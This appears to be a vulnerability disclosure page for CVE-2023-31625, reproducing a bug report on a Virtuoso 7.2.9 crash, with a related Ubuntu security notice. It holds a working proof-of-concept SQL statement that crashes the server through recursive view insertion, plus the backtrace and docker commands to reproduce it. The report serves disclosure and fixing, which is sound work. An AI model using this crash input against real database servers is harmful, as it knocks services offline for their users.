Headline
CVE-2023-31625: virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118) · Issue #1132 · openlink/virtuoso-opensource
An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE t1 ( x LONG VARCHAR, a INTEGER DEFAULT 0, b LONG VARCHAR, t2 LONG VARCHAR ); CREATE VIEW t1 AS SELECT * FROM t1; INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null’, '’, repeat('1234567890’,50000));
backtrace:
#0 0x7f421a573900 (psiginfo+0x134a0) #1 0x7f421a588f9a (vscanf+0x14a) #2 0x7f421a55edf6 (__snprintf+0x96) #3 0x5a2227 (sch_full_proc_name_1+0x2c7) #4 0x7879a3 (sinv_find_func_map+0x143) #5 0x788fb7 (sinv_check_exp+0x317) #6 0x78a03d (sinv_sqlo_check_col_val+0xad) #7 0x816d50 (sqlc_insert_view+0x330) #8 0x81721d (sqlc_insert_view+0x7fd) #9 0x81721d (sqlc_insert_view+0x7fd) #10 0x81721d (sqlc_insert_view+0x7fd) #11 0x81721d (sqlc_insert_view+0x7fd) #12 0x81721d (sqlc_insert_view+0x7fd) #13 0x81721d (sqlc_insert_view+0x7fd) … #5714 0x81721d (sqlc_insert_view+0x7fd) #5715 0x81721d (sqlc_insert_view+0x7fd) #5716 0x81721d (sqlc_insert_view+0x7fd) #5717 0x6b7387 (sql_stmt_comp+0x987) #5718 0x6ba122 (sql_compile_1+0x1a62) #5719 0x7c8cd0 (stmt_set_query+0x340) #5720 0x7cabc2 (sf_sql_execute+0x922) #5721 0x7cbf4e (sf_sql_execute_w+0x17e) #5722 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #5723 0xe1f01c (future_wrapper+0x3fc) #5724 0xe2691e (_thread_boot+0x11e) #5725 0x7f421a84c609 (start_thread+0xd9) #5726 0x7f421a61c133 (clone+0x43)
ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”
Related news
Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.